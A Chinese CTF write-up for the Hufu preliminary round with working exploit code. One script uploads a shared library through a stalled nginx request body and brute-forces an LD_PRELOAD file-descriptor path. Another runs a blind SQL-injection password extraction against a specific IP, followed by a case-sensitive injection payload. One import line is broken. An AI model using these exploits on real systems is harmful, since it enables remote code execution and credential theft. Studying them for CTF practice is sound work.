虎符初赛

虎符ctf初赛

java-ezchain

参考文章：
http://novic4.cn/index.php/archives/23.html
https://ha1c9on.top/?p=1973

ezphp

nginx的临时缓存文件配合LD_PRELOAD

参考hxp题解
参考https://tttang.com/archive/1384/

exp

from threading
import Thread
import requests
import socket
import time
port = 8020
host = "ip"


def do_so():
    """Send evil.so in a deliberately incomplete POST and hold the connection.

    The request announces a Content-Length 11 bytes larger than the bytes
    actually sent, so the server keeps waiting for the remainder; the page
    notes that nginx spools such a pending body to a temporary file. The
    socket is held open for 10 s before being closed, which is the window the
    fd brute-force script on this page uses to reference that file through
    /proc/<pid>/fd/<fd> in LD_PRELOAD. Defensive note: the chain only works
    because a request parameter is allowed to set LD_PRELOAD for the worker;
    an application that never passes user-controlled values into its process
    environment is not affected by the half-finished upload alone.
    """
    with open("evil.so", "rb") as payload_file:
        payload = payload_file.read()

    # Header lines joined with CRLF; the two trailing empty entries yield the
    # blank line that terminates the header block.
    header_lines = [
        "POST /index.php HTTP/1.1",
        f"HOST:{host}:{port}",
        f"Content-Length:{len(payload) + 11}",
        "",
        "",
    ]
    request = "\r\n".join(header_lines).encode() + payload

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as conn:
        conn.connect((host, port))
        conn.sendall(request)
        # Keep the incomplete request alive while the fd guesses run.
        time.sleep(10)


if __name__ == "__main__":
    do_so()

fd爆破

import requests
from threading import Thread
port = 8020
host = "ip"


def ldload(pid, fd):
    """GET index.php with env=LD_PRELOAD=/proc/<pid>/fd/<fd> and return the response.

    Companion to the upload script on this page: the guessed (pid, fd) pair is
    meant to name the descriptor of the still-open request body. Whether the
    library is loaded at all depends on the application forwarding the ``env``
    query parameter into the process environment; removing that pass-through
    is the fix on the application side.
    """
    so_path = f"/proc/{pid}/fd/{fd}"
    target = f"http://{host}:{port}/index.php"
    return requests.get(target, params={"env": f"LD_PRELOAD={so_path}"})


if __name__ == "__main__":
    # One thread per (pid, fd) guess: pids 12..39 and fds 1..39, 1092 requests.
    for pid_guess in range(12, 40):
        for fd_guess in range(1, 40):
            worker = Thread(target=ldload, args=(pid_guess, fd_guess))
            worker.start()

chain

regexp配合短路与进行盲注。得到密码后对大小写进行爆破。

import requests
import time
import json
import string
url = "http://47.107.231.226:20155/login"

# Blind injection through the `username` field: the crafted value turns the
# login query into `password` REGEXP '^<prefix>' checks, and the script takes
# an HTTP 401 as "this prefix is right". Parameterised queries would close the
# injection; the page also notes the default collation cannot tell case apart,
# which is why a separate case brute force follows.
session = requests.session()
result = ''
password = 'm'
# Candidates recorded by the author during earlier runs:
# m52fpldxyylb++^
# M52fpLdxyYlB++ M52fpLdxyYlB 52fpLdxyYlB
# m52fpldxyylb^eizar!8gxH$
# M52fpLdxyYlB^eizAR!8gxH$
#qay8tefyzc67aeoo qay8tEFYZc67aeoO
#qay8tEFYZc67aeoO
# \\\\! \\\\@ \\\\$ \\\\% \\\\^ \\\\& \\\\_ \\\\+

# Search alphabet; the backslash is part of it (the original literal "\@" is
# not a valid escape, so Python keeps the backslash).
alphabet = string.ascii_letters + string.digits + "!\\@%^&_+$"
print(alphabet)
# Regex metacharacters are sent with a doubled backslash in front of them.
special = "!\\@$%^&_+"

while True:
    for ch in alphabet:
        if ch in special:
            ch = "\\\\" + ch
        candidate = password + ch

        body = (
            "username=fdfd'or`password`regexp'^"
            + candidate
            + "'or`password`regexp'^[&password=123"
        )
        res = session.post(
            url, body, headers={"Content-Type": "application/x-www-form-urlencoded"}
        )
        # 401 is the oracle the script relies on; every hit extends the prefix.
        if res.status_code == 401:
            result += ch
            password += ch
            print(password)
            continue

但是这样无法区别大小写，所以还得爆破大小写登录；官方wp里面使用的是整数溢出触发错误 + COLLATE 'utf8mb4_bin' 或 COLLATE 'utf8mb4_0900_as_cs' 来区别大小写。
payload

username=b'||`password`COLLATE'utf8mb4_0900_as_cs'like'm526§%'&&`id`='1'||`password`regexp'[&password=1
